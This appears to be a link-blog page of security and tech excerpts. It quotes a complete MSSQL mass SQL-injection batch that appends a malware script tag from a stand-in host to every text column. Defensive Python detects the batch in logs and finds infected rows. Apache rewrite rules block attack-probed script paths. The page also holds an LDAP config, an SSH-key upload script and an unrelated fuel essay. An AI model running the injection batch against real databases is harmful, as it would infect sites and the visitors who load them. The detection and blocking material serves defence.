cr0 blog: Write once, own everyone, Java deserialization issues.
Interesting and scary details on a vulnerability for almost every modern browser out there (IE, Firefox, Safari, etc.) with Java Enabled. The fix: turn off Java. Sheesh!
I’m tryin’ ta think but nuthin’ happens!
Here’s a sample of the type of SQL Injection MSSQL (and possibly Sybase) databases may be subjected to:
DECLARE @T varchar(255), @C varchar(4000)
DECLARE Table_Cursor CURSOR FOR
  select a.name, b.name from sysobjects a, syscolumns b
  where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
  exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://www.domain.com/malware/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://www.domain.com/malware/w.js"></script><!--''')
  FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
TrustedSource – Blog – New SQL Injection Attack Infecting Machines
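As an added, defensive example (not from the TrustedSource post or from this blog): a Python check that flags access-log requests carrying the cursor-and-sysobjects batch quoted above, including the hex-literal CAST wrapping that this family of attacks used to hide the batch in the request (that variant goes beyond the sample quoted here), plus a scan of table values for the injected script tag so infected rows can be found and cleaned. The log lines, table rows and hex payload are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Weak indicators of the cursor-driven batch above; two or more in one
# request is the signal worth alerting on (admin tooling may mention one).
INDICATORS = {
    "declare_cursor": re.compile(r"\bdeclare\b.*\bcursor\b", re.S),
    "sysobjects": re.compile(r"\bsysobjects\b"),
    "syscolumns": re.compile(r"\bsyscolumns\b"),
    "exec_call": re.compile(r"\bexec\s*\("),
    "fetch_status": re.compile(r"@@fetch_status"),
    "hex_cast": re.compile(r"\bcast\s*\(\s*0x[0-9a-f]+\s+as\s+n?(?:var)?char"),
    "script_tag": re.compile(r"</title><script\s+src="),
}
HEX_CAST = re.compile(r"cast\s*\(\s*0x([0-9a-f]+)\s+as\s+(n?)(?:var)?char", re.I)
LOG_REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/')
INJECTED_MARKER = "</title><script src="


def decode_hex_casts(text):
    """Plaintext hidden in CAST(0x... AS [N]VARCHAR) literals. In-the-wild
    variants wrapped the whole batch this way so nothing readable appeared in
    the request. Assumption: NVARCHAR hex is UTF-16LE, VARCHAR hex single-byte."""
    out = []
    for m in HEX_CAST.finditer(text):
        hexdigits = m.group(1)
        if len(hexdigits) % 2:          # malformed literal; nothing to decode
            continue
        enc = "utf-16-le" if m.group(2).lower() == "n" else "latin-1"
        out.append(bytes.fromhex(hexdigits).decode(enc, errors="replace"))
    return " ".join(out)


def normalize(request_target):
    """URL-decode (twice, to undo double encoding), fold whitespace and case,
    and append whatever the hex literals decode to."""
    text = unquote_plus(unquote_plus(request_target))
    text = " ".join(text.split()).lower()
    return text + " " + decode_hex_casts(text).lower()


def indicators_for(request_target):
    text = normalize(request_target)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def is_mass_injection(request_target):
    return len(indicators_for(request_target)) >= 2


def flag_log_lines(lines):
    """(line number, indicators) for each access-log line whose request target
    looks like the injection; lines without a parseable request are scanned whole."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_REQUEST.search(line)
        found = indicators_for(m.group(1) if m else line)
        if len(found) >= 2:
            hits.append((n, found))
    return hits


def find_infected_values(rows):
    """rows: iterable of (table, column, value). Returns the (table, column)
    pairs holding the injected tag, i.e. what a clean-up pass must strip."""
    return sorted({(t, c) for t, c, v in rows
                   if isinstance(v, str) and INJECTED_MARKER in v.lower()})


# Constructed samples (not real traffic or data): a benign request, the batch
# quoted above URL-encoded into a query string, and the start of that batch
# hidden in a hex CAST literal.
HEX_SAMPLE = ("DECLARE @T varchar(255) DECLARE Table_Cursor CURSOR FOR select "
              "a.name,b.name from sysobjects a,syscolumns b").encode("latin-1").hex().upper()
SAMPLE_LOG = [
    '10.0.0.5 - - [20/Apr/2008:10:01:02 +0000] "GET /product.asp?id=42 HTTP/1.1" 200 5120',
    '10.0.0.7 - - [20/Apr/2008:10:01:09 +0000] "GET /product.asp?id=42;DECLARE%20@T%20'
    'varchar(255),@C%20varchar(4000)%20DECLARE%20Table_Cursor%20CURSOR%20FOR%20select%20'
    'a.name,b.name%20from%20sysobjects%20a,syscolumns%20b%20where%20a.id=b.id HTTP/1.1" 500 312',
    f'10.0.0.9 - - [20/Apr/2008:10:02:11 +0000] "GET /product.asp?id=42;DECLARE%20@S%20'
    f'VARCHAR(4000);SET%20@S=CAST(0x{HEX_SAMPLE}%20AS%20VARCHAR(4000));EXEC(@S) HTTP/1.1" 500 312',
]
SAMPLE_ROWS = [
    ("Products", "Description", "Blue widget, 3 inch"),
    ("Products", "Description",
     'Red widget"></title><script src="http://www.domain.com/malware/w.js"></script><!--'),
    ("Orders", "Note", None),
]

if __name__ == "__main__":
    for n, found in flag_log_lines(SAMPLE_LOG):
        print(f"line {n}: {', '.join(found)}")
    print("infected columns:", find_infected_values(SAMPLE_ROWS))
```

The request-side check is for triage of logs after the fact; the row scan is what tells you which columns the update loop actually reached. Neither replaces the real fix, which is parameterised queries and a database login that cannot read sysobjects or run UPDATE on every user table.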
Here’s a nice discussion on how to improve Mac OS X Security. It contains some dreams about what Mac OS X 10.6 Snow Leopard will bring.
How Snow Leopard can save Mac OS X from malware attacks | Zero Day | ZDNet.com
I, Cringely . The Pulpit . It’s the Platform, Stupid | PBS
Cars are the key to U.S. energy consumption. The dominant automotive platform here, whether you drive a truck, a car, or a motorcycle, relies on gasoline-fueled internal combustion engines. That’s the platform we are unlikely to change quickly. So how do we leave that platform intact and unchanged, ask nobody to significantly sacrifice, yet still achieve the noble (and Nobel) goals of lower fuel consumption, lower greenhouse gas emissions, lower pollution levels, dramatically lower oil consumption, lower cost, and lower geopolitical vulnerability for our country? There’s only one way I know to accomplish this: change the fuel.
This happened to a certain extent in Brazil during the ’70s and ’80s by embracing ethanol. But ethanol has less energy per gallon so fuel consumption goes up and mileage goes down. Ethanol can’t be shipped in pipelines also used for oil. Cars have to be modified to run on it and even then there are issues about internal corrosion. Ethanol is far from perfect. What’s needed is a replacement for gasoline that looks and feels and tastes just like gas to your car but isn’t made from oil. Then the platform could remain completely unchanged yet my 1966 Thunderbird (and the world) could benefit starting with the very next tankful.
There is such a fuel, developed by a husband and wife team of scientists working in Indiana in cooperation with Purdue University. This new fuel, called SwiftFuel, is right now intended for airplanes, not cars, but the lessons are the same.
How to nuke attackers via httpd.conf?
That can be accomplished using mod_access "Deny from <envar>" with mod_setenvif testing REQUEST_URI or by using mod_rewrite:
RewriteRule (awstats.pl|xmlrpc.php|includer.cgi|hints.pl)$ - [F]
Of course, the problem is that you'll still be wasting bandwidth sending your custom 403 error page to these idiots.
A work-around (stay with me here) is to do the following:
Create a new subdirectory below web root.
Place a custom 403 error page in that subdirectory. Let's call it "403.html" for now. Leave out all the HEAD content, and just put a few characters in this file, so you can recognize it by filesize when fetched — I use just the text "No."
Now create an .htaccess file in that subdirectory that contains the following:
ErrorDocument 403 /path_to_this_subdirectory/403.html
Options +FollowSymLinks
RewriteEngine on
RewriteRule !^403.html$ - [F]
Now, instead of the first code snippet I posted above, use the following in httpd.conf or in your web root .htaccess file:
RewriteRule (awstats.pl|xmlrpc.php|includer.cgi|hints.pl)$ /path_to_subdirectory/$1 [L]
Now when a bad-bot attempts to fetch one of those files, it gets rewritten to the subdirectory. But no files in that subdirectory are allowed to be fetched except for 403.html. So, the 403 error handler is invoked, and returns only a 403-Forbidden server response header and the three-byte response from 403.html, thus minimizing your bandwidth loss.
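A way to confirm the setup does what the post describes, as an added example rather than anything from the quoted post: a Python script that requests each path named in your RewriteRule from your own server and reports whether it came back as a 403 with only the tiny 403.html body. The built-in stand-in HTTP handler mimics the expected Apache behaviour so the script runs without a real server; the path list, hostname and port are assumptions you replace with your own.

```python
import threading
import http.client
from http.server import BaseHTTPRequestHandler, HTTPServer

# Paths named in the RewriteRule above (assumed to be the ones you configured).
BLOCKED_PATHS = ["/awstats.pl", "/xmlrpc.php", "/includer.cgi", "/hints.pl"]


def fetch(host, path, port=80, timeout=5):
    """One GET against your own server; returns (status, body bytes)."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", path, headers={"User-Agent": "rewrite-check/0.1"})
        resp = conn.getresponse()
        return resp.status, resp.read()
    finally:
        conn.close()


def verdict(status, body, max_bytes=16):
    """'ok' when the answer is a 403 with a tiny body; otherwise why the
    rule is not doing its job (wrong status, or a full error page after all)."""
    if status != 403:
        return f"not blocked (HTTP {status})"
    if len(body) > max_bytes:
        return f"blocked but still serving {len(body)} bytes"
    return "ok"


def check_server(host, paths=BLOCKED_PATHS, port=80):
    results = {}
    for p in paths:
        try:
            status, body = fetch(host, p, port)
            results[p] = verdict(status, body)
        except OSError as e:
            results[p] = f"error: {e}"
    return results


class StandInHandler(BaseHTTPRequestHandler):
    """Local stand-in for Apache after the configuration above: blocked paths
    get a bare 403 with the three-byte body, anything else a normal page.
    Exists only so the check can be exercised without a real server."""
    def do_GET(self):
        if self.path in BLOCKED_PATHS:
            status, body = 403, b"No."
        else:
            status, body = 200, b"<html><body>hello</body></html>"
        self.send_response(status)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_stand_in():
    """Start the stand-in on a free loopback port; returns (server, port)."""
    srv = HTTPServer(("127.0.0.1", 0), StandInHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


if __name__ == "__main__":
    srv, port = start_stand_in()
    for path, result in check_server("127.0.0.1", port=port).items():
        print(f"{path}: {result}")
    srv.shutdown()
```

Against a real server, call check_server with your hostname; a "blocked but still serving N bytes" result usually means the inner .htaccess was not read (AllowOverride off) and the default error page is being sent instead of 403.html.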
HOWTO Use Your Mac From Anywhere
This guide demonstrates using SSH tunnels and VNC screen-sharing software to use your Mac from any PC over the Internet. It’s fast, secure, cross-platform, and can be done entirely with open source software.
macosxhints.com – Authenticate Apache 2 using Mac OS X Open Directory
Change this:
cn=user1,dc=example,dc=com
to this:
uid=user1,dc=example,dc=com
so it looks like this:
AuthType Basic
AuthName "Testing of LDAP auth"
AuthBasicProvider ldap
AuthzLDAPAuthoritative on
AuthLDAPBindDN uid=testaccount1,cn=users,dc=geo,dc=vuw,dc=ac,dc=nz
AuthLDAPBindPassword [plaintext password for user 'testaccount1']
AuthLDAPURL ldap://server1.geo.vuw.ac.nz/dc=geo,dc=vuw,dc=ac,dc=nz
require valid-user
Clear as mud? 😉
Plugin update & security / privacy – wp-hackers | Google Groups
I think the Penguins said it best… Interesting… but at least there are plugins and such to overcome… This was a bit of FUD, but it is interesting to find out about how Akismet sends $_SERVER configs to the mothership…
Any set of characters » Fun with comment spammers..
And I thought I hated spammers…
macosxhints.com – A shell script to upload SSH keys to remote machines
This is a fairly useful script to upload ssh authorized keys to remote servers.
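An added example of the same idea, not the macosxhints script itself: a Python version that validates the public-key line before it ever leaves the machine (so a private key or a mangled line cannot be appended by accident), builds an idempotent remote command that creates ~/.ssh with safe permissions and appends the key only once, and pushes it over an ordinary ssh login. It assumes ssh is on PATH and the remote login shell is POSIX; the sample key is constructed for the example and belongs to nobody.

```python
import base64
import re
import shlex
import subprocess

# type, base64 blob, optional comment (sk-* hardware-backed key types omitted)
KEY_LINE = re.compile(
    r"^(ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-nistp(?:256|384|521)) "
    r"([A-Za-z0-9+/]+={0,2})(?: (.*))?$")


def parse_pubkey(line):
    """Validate one OpenSSH public-key line; returns (type, b64, comment).
    Raises ValueError for private keys or junk so that nothing but a real
    public key ever gets appended to a remote authorized_keys."""
    line = line.strip()
    if "PRIVATE KEY" in line:
        raise ValueError("refusing to upload what looks like a private key")
    m = KEY_LINE.match(line)
    if not m:
        raise ValueError("not an OpenSSH public key line")
    ktype, b64, comment = m.groups()
    blob = base64.b64decode(b64, validate=True)
    # The wire format starts with a length-prefixed copy of the key type;
    # it must agree with the text type or the line has been mangled.
    n = int.from_bytes(blob[:4], "big")
    if blob[4:4 + n] != ktype.encode("ascii"):
        raise ValueError("key type field does not match key blob")
    return ktype, b64, comment or ""


def remote_install_command(pubkey_line):
    """Shell run on the remote host: create ~/.ssh with safe permissions and
    append the key only if its blob is not already there (safe to re-run)."""
    ktype, b64, comment = parse_pubkey(pubkey_line)
    key = shlex.quote(f"{ktype} {b64} {comment}".rstrip())
    return ("umask 077 && mkdir -p ~/.ssh && chmod 700 ~/.ssh && "
            f"{{ grep -qF {shlex.quote(b64)} ~/.ssh/authorized_keys 2>/dev/null || "
            f"printf '%s\\n' {key} >> ~/.ssh/authorized_keys; }}")


def upload_key(host, pubkey_line, user=None, dry_run=False):
    """Push the key over an existing (password or agent) ssh login. Returns
    the argv used; with dry_run=True nothing is executed."""
    argv = ["ssh", f"{user}@{host}" if user else host, remote_install_command(pubkey_line)]
    if not dry_run:
        subprocess.run(argv, check=True)
    return argv


def make_sample_pubkey(seed=bytes(range(32))):
    """A format-valid ed25519 public-key line built from a fixed 32-byte value.
    Constructed for the example only; nobody holds the private half."""
    blob = (len(b"ssh-ed25519").to_bytes(4, "big") + b"ssh-ed25519"
            + (32).to_bytes(4, "big") + seed)
    return "ssh-ed25519 " + base64.b64encode(blob).decode() + " demo@example"


if __name__ == "__main__":
    print(" ".join(upload_key("host.example", make_sample_pubkey(), user="alice", dry_run=True)))
```

In real use you would read the line from ~/.ssh/id_ed25519.pub (or whichever key you use) and pass it to upload_key; the umask and chmod matter because sshd silently ignores authorized_keys when the directory or file is group- or world-writable.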